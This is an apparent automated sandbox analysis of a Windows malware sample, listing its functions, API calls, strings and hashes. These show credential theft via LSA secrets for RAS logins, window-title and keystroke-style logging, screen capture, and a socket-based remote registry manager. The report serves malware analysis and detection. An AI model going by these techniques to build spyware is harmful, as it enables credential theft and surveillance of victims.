                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: EnvironmentFileModuleNameVariableVersion
                        • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                        • API String ID: 1385375860-4131005785
                        • Opcode ID: 4cdc25b0e14a95a192e6cf68fc3eb2527211c1853bd0bdc13f119c00c0274926
                        • Instruction ID: 540452ff0e4977abba791a7d3beefe551e463797043e7728ed1094b193f1ab1f
                        • Opcode Fuzzy Hash: 4cdc25b0e14a95a192e6cf68fc3eb2527211c1853bd0bdc13f119c00c0274926
                        • Instruction Fuzzy Hash: 4B3125719412886DEB318F706C45BDA3F6C8B0A705F1404FBE185FA2C2E63D9F998719
                        Function 10007560 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 100075CC
                          • Part of subcall function 10007340: LsaOpenPolicy.ADVAPI32(00000000,?,00000004,?), ref: 10007362
                        • LsaFreeMemory.ADVAPI32(?), ref: 100075FA
                        • LsaFreeMemory.ADVAPI32(?), ref: 10007624
                          • Part of subcall function 100073D0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,00000000), ref: 10007409
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeMemory$ByteCharMultiOpenPolicyWidewsprintf
                        • String ID: L$_RasDefaultCredentials#0$RasDialParams!%s#0
                        • API String ID: 3354934605-1591505386
                        • Opcode ID: 89401d473c1ae37d5d2ac9828142e643794bfa4f5db1d4a2d20f1e212a850289
                        • Instruction ID: 10d7f79d1800bdb995d923bc7ff5189c1fec0a70fd3281d4143c11dcb8492859
                        • Opcode Fuzzy Hash: 89401d473c1ae37d5d2ac9828142e643794bfa4f5db1d4a2d20f1e212a850289
                        • Instruction Fuzzy Hash: 83218079A047119BE314DF68D89096BB3E9FBCC700F00892CF98997341DA79ED458BD1
                        Function 100091B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(00000021,40000000,00000002,00000000,00000003,00000080,00000000,?,00000001), ref: 100091DC
                        • SetFilePointer.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 100091ED
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000001), ref: 10009207
                        • CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000920E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandlePointerWrite
                        • String ID: p
                        • API String ID: 3604237281-2181537457
                        • Opcode ID: bcc1cd4cbb62ecbc575abc8427f350afb3af9461df4ed93e73f2b520365a0fe5
                        • Instruction ID: c29a3a25608ae6e4858f618ea9f01b6aa6551fe5910cd7b292a73e7336b4a8fb
                        • Opcode Fuzzy Hash: bcc1cd4cbb62ecbc575abc8427f350afb3af9461df4ed93e73f2b520365a0fe5
                        • Instruction Fuzzy Hash: 8611CE71244312ABE304DF54CC85F6BB7E9EFD9715F040A1DF6449B2D0E7B4AA098BA2
                        Function 1000D630 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 1000D5D0: RtlEnterCriticalSection.NTDLL(?), ref: 1000D5D8
                          • Part of subcall function 1000D5D0: RtlLeaveCriticalSection.NTDLL(?), ref: 1000D5F2
                        • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D656
                        • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1000D664
                        • FreeLibrary.KERNEL32(00000000), ref: 1000D676
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalLibrarySection$AddressEnterFreeLeaveLoadProc
                        • String ID: closesocket$ws2_32.dll
                        • API String ID: 2819327233-181964208
                        • Opcode ID: 227b4ddc28ed2b789dbb372061b8aa4e8a57007cd9a807f8c58f6723425c27a5
                        • Instruction ID: c7a85589b374110c36b37f56cd0419c948af16733dbc941b48c3ffccf564ddd3
                        • Opcode Fuzzy Hash: 227b4ddc28ed2b789dbb372061b8aa4e8a57007cd9a807f8c58f6723425c27a5
                        • Instruction Fuzzy Hash: 50F02776000B20ABE210EF289C84D9F7798EB89722F000629FA4086241CB349904C7B6
                        Function 00403A29 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                        Download Yara Rule
                        APIs
                        • GetStartupInfoA.KERNEL32(?), ref: 00403A82
                        • GetFileType.KERNEL32(00000800), ref: 00403B28
                        • GetStdHandle.KERNEL32(-000000F6), ref: 00403B81
                        • GetFileType.KERNEL32(00000000), ref: 00403B8F
                        • SetHandleCount.KERNEL32 ref: 00403BC6
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: FileHandleType$CountInfoStartup
                        • String ID:
                        • API String ID: 1710529072-0
                        • Opcode ID: 118daacb8ad3a432c1052072e65d4aef40e619f482eec3fc3d300b61cce5d762
                        • Instruction ID: d76856ce9a64dd3daf10aa6f0c08c049f46bccca71c3927d2cedc3f9f2fa99cb
                        • Opcode Fuzzy Hash: 118daacb8ad3a432c1052072e65d4aef40e619f482eec3fc3d300b61cce5d762
                        • Instruction Fuzzy Hash: 5D5147316042048BD730DF28CC447573FB8AB1172AF55427ED4A6E72E2D778AA49CB59
                        Function 1000F3F0 Relevance: 7.6, APIs: 5, Instructions: 95synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,1006A281,000000FF,1000F595,?,?,?,?,?,?,1006A290,000000FF), ref: 1000F413
                        • CloseHandle.KERNEL32(?,?,?,1006A281,000000FF,1000F595,?,?,?,?,?,?,1006A290,000000FF), ref: 1000F41D
                        • ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A281,000000FF,1000F595,?,?,?,?,?,?,1006A290,000000FF), ref: 1000F441
                        • ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A281,000000FF,1000F595,?,?,?,?,?,?,1006A290,000000FF), ref: 1000F472
                          • Part of subcall function 1000FD20: LoadCursorA.USER32(00000000,00000000), ref: 1000FDE3
                        • ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A281,000000FF,1000F595,?,?,?,?,?,?,1006A290,000000FF), ref: 1000F499
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@$CloseCursorHandleLoadObjectSingleWait
                        • String ID:
                        • API String ID: 1916621575-0
                        • Opcode ID: 30cb649d545099e3b134517d6e3a6ff664e7b1fcc6bc595678dda8d4b5caa323
                        • Instruction ID: af10be2d057552379ca070793410e945b71ac961525771fe911eddac7fa67470
                        • Opcode Fuzzy Hash: 30cb649d545099e3b134517d6e3a6ff664e7b1fcc6bc595678dda8d4b5caa323
                        • Instruction Fuzzy Hash: 0E31D4B1B447416BE360CF288C46B5BBAE5EF85750F000A2DF69A9B6C1D7B0E448C792
                        Function 10010560 Relevance: 7.6, APIs: 5, Instructions: 91windowCOMMON
                        Download Yara Rule
                        APIs
                        • CreateDIBSection.GDI32(10010396,?,00000000,10010396,00000000,00000000), ref: 100105BE
                        • SelectObject.GDI32(?,00000000), ref: 100105CD
                        • BitBlt.GDI32(?,?,?,?,?,?,?,?,?), ref: 100105EA
                        • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1001060A
                        • DeleteObject.GDI32(?), ref: 10010632
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Object$CreateDeleteSectionSelect
                        • String ID:
                        • API String ID: 3188413882-0
                        • Opcode ID: 6914c3d10498faa931e45aa64833eb2ce3589ba839e4f727551740e0ed738175
                        • Instruction ID: 17709fe5c9bee505a466ed7633a8078ca6610504c6facd25fdc6690399d5a77f
                        • Opcode Fuzzy Hash: 6914c3d10498faa931e45aa64833eb2ce3589ba839e4f727551740e0ed738175
                        • Instruction Fuzzy Hash: 3631D2B6200705AFE214CF59CC84E27F7AAFB88710F108A1DFA9587795C7B1F8408BA0
                        Function 10009A80 Relevance: 7.6, APIs: 5, Instructions: 71stringtimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32 ref: 10009A96
                        • GetWindowTextA.USER32(00000000,1007E37C,00000400), ref: 10009AAC
                        • lstrlen.KERNEL32(1007E37C), ref: 10009AE1
                        • GetLocalTime.KERNEL32(?), ref: 10009AF4
                        • wsprintfA.USER32 ref: 10009B49
                          • Part of subcall function 10009930: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10009944
                          • Part of subcall function 10009930: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 100099FB
                          • Part of subcall function 10009930: GetFileSize.KERNEL32(00000000,00000000), ref: 10009A0E
                          • Part of subcall function 10009930: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10009A22
                          • Part of subcall function 10009930: lstrlen.KERNEL32(?), ref: 10009A30
                          • Part of subcall function 10009930: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10009A39
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Windowlstrlen$??2@CreateDirectoryForegroundLocalPointerSizeSystemTextTimewsprintf
                        • String ID:
                        • API String ID: 1247169605-0
                        • Opcode ID: d5d440a03ae440b4868d873a8e62c6d5429f052b4cf7eb20d56548b6380e63a3
                        • Instruction ID: b9f57a072098cc30263dd14e1e0347184811832503b0d4ba37cec8025abd72ce
                        • Opcode Fuzzy Hash: d5d440a03ae440b4868d873a8e62c6d5429f052b4cf7eb20d56548b6380e63a3
                        • Instruction Fuzzy Hash: D421AFB1205393ABF304CB28CC98A6776A6EF8C710F408A38F68597290D67C9D488B56
                        Function 10012BE0 Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 10012BE8
                        • GetThreadDesktop.USER32(00000000), ref: 10012BEF
                        • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 10012C10
                        • SetThreadDesktop.USER32(?), ref: 10012C24
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Thread$Desktop$CurrentInformationObjectUser
                        • String ID:
                        • API String ID: 3041254040-0
                        • Opcode ID: 556f9f34ce626c626d025b5ad994241f14c7a72d7fb554adc5a2ad2683bfa424
                        • Instruction ID: 1aa550abbb95f75a1cbcec525135b1f273917451a5e44a8caf5b10736729aa80
                        • Opcode Fuzzy Hash: 556f9f34ce626c626d025b5ad994241f14c7a72d7fb554adc5a2ad2683bfa424
                        • Instruction Fuzzy Hash: A4F059B12002606BF3109728DCC9BEF3759FF84725F804435F640C2050FBF8898581E2
                        Function 1000A950 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 33sleepstringCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleeplstrlenwsprintf
                        • String ID: Host$SYSTEM\CurrentControlSet\Services\%s
                        • API String ID: 1736695411-3973614608
                        • Opcode ID: 94f497dffb1bef5f3e62e50f885c10ea256d70318ec0c8f9adc222c6de03b443
                        • Instruction ID: b16c557489325780dc41c0752768b57e954bfeb3216f92d6d969889069997215
                        • Opcode Fuzzy Hash: 94f497dffb1bef5f3e62e50f885c10ea256d70318ec0c8f9adc222c6de03b443
                        • Instruction Fuzzy Hash: 46F0E2B5500321BFF320AB54DC49FEB3BA9DFC4308F004818FB48A6191D2B56A89C6E6
                        Function 10019300 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130comCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.OLE32(10070454,00000000,00000001,100703C4,?), ref: 10019330
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateInstance
                        • String ID: FriendlyName
                        • API String ID: 542301482-3623505368
                        • Opcode ID: 660ee549ab857ccc2a3e0e8018f4041201d3708b72596babb579123d471cc425
                        • Instruction ID: 80cbb2717d17b0c08811b6de504c2084bbc1f937f163f1ab5e3a18075972b324
                        • Opcode Fuzzy Hash: 660ee549ab857ccc2a3e0e8018f4041201d3708b72596babb579123d471cc425
                        • Instruction Fuzzy Hash: C0410671204341AFD210DF64CC84F5AB7E9FBC9B24F108A18B5A9DB290DB75E846CB62
                        Function 1000D230 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000D28B
                        • DeleteFileA.KERNEL32(?), ref: 1000D338
                          • Part of subcall function 1000D0D0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000D102
                          • Part of subcall function 1000D0D0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 1000D1B9
                          • Part of subcall function 1000D0D0: GetFileSize.KERNEL32(00000000,00000000), ref: 1000D1C8
                          • Part of subcall function 1000D0D0: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 1000D1D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$DirectorySystem$??2@CreateDeleteSize
                        • String ID: .key$XXXXXX
                        • API String ID: 2930496114-2601115946
                        • Opcode ID: ae07148d8bb9eb93f010ba8bf2deb028565ee777514af0f51f669a9ee2717ab0
                        • Instruction ID: 58dd92c60c2c1446215199cafdfc7cfc7d180e3c760536d4116d3be8e1391897
                        • Opcode Fuzzy Hash: ae07148d8bb9eb93f010ba8bf2deb028565ee777514af0f51f669a9ee2717ab0
                        • Instruction Fuzzy Hash: A0310432A006085BDB28DAB888527AEB796FB85770F14032EF626973C0DFF45E448790
                        Function 10007340 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                        Download Yara Rule
                        APIs
                        • LsaOpenPolicy.ADVAPI32(00000000,?,00000004,?), ref: 10007362
                        • LsaRetrievePrivateData.ADVAPI32(?,?,?), ref: 10007395
                        Strings
                        • L$_RasDefaultCredentials#0, xrefs: 10007345
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: DataOpenPolicyPrivateRetrieve
                        • String ID: L$_RasDefaultCredentials#0
                        • API String ID: 1655749231-2801509457
                        • Opcode ID: 2d21782bc5c36114cb19ed2205da1e80d6db33661989c39e1f2bf4eafcba104b
                        • Instruction ID: c33f2f5ebb2e4ab79ed7a152476c9e66349a4213c8409a4b1f5592358f7a1927
                        • Opcode Fuzzy Hash: 2d21782bc5c36114cb19ed2205da1e80d6db33661989c39e1f2bf4eafcba104b
                        • Instruction Fuzzy Hash: 4601D8B26043026FF708DA69CC42DBBB3D9EBD4754F408D2DF944C6150E674E949C392
                        Function 1000A040 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                        Download Yara Rule
                        APIs
                        • OutputDebugStringA.KERNEL32(s Loop_RegeditManager(SOCKET sRemote)), ref: 1000A067
                          • Part of subcall function 10003990: WSAStartup.WS2_32(00000202,?), ref: 100039FD
                          • Part of subcall function 10003990: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 10003A0B
                          • Part of subcall function 10003B50: ResetEvent.KERNEL32(?,74DF23A0,00000000,?,?,?,?,?,10002764,?,?), ref: 10003B63
                          • Part of subcall function 10003B50: socket.WS2_32 ref: 10003B76
                        • OutputDebugStringA.KERNEL32(s !socketClient.Connect !=-1), ref: 1000A0B3
                          • Part of subcall function 10003A90: WaitForSingleObject.KERNEL32(?,000000FF,00000000,74DF2EE0,?,00000000,10069E7C,000000FF,100028C0), ref: 10003ACC
                          • Part of subcall function 10003A90: CloseHandle.KERNEL32(?), ref: 10003AEF
                          • Part of subcall function 10003A90: CloseHandle.KERNEL32(?), ref: 10003AF8
                          • Part of subcall function 10003A90: WSACleanup.WS2_32 ref: 10003AFA
                        Strings
                        • s Loop_RegeditManager(SOCKET sRemote), xrefs: 1000A062
                        • s !socketClient.Connect !=-1, xrefs: 1000A0AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseDebugEventHandleOutputString$CleanupCreateObjectResetSingleStartupWaitsocket
                        • String ID: s !socketClient.Connect !=-1$s Loop_RegeditManager(SOCKET sRemote)
                        • API String ID: 660129190-2143064718
                        • Opcode ID: b3408c2e665004f642960889d79e8bb37457511fe7675c174eea74838ca707a4
                        • Instruction ID: 33de5455edd4078826519d4261a1314639563161ec7838f0291edb895abbdde2
                        • Opcode Fuzzy Hash: b3408c2e665004f642960889d79e8bb37457511fe7675c174eea74838ca707a4
                        • Instruction Fuzzy Hash: 1111A3750082818AE360DF64DD51BDB77D4EB95760F008B0EB5AA632C4DF342848CB73
                        Function 10012090 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 10012110: GetCurrentProcess.KERNEL32(00000028,?,?,10009E80,?,00000000,00000000,00000001), ref: 10012120
                          • Part of subcall function 10012110: OpenProcessToken.ADVAPI32(00000000,?,10009E80,?,00000000,00000000,00000001), ref: 10012127
                        • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 100120C3
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 100120CE
                        • CloseHandle.KERNEL32(00000000), ref: 100120D5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
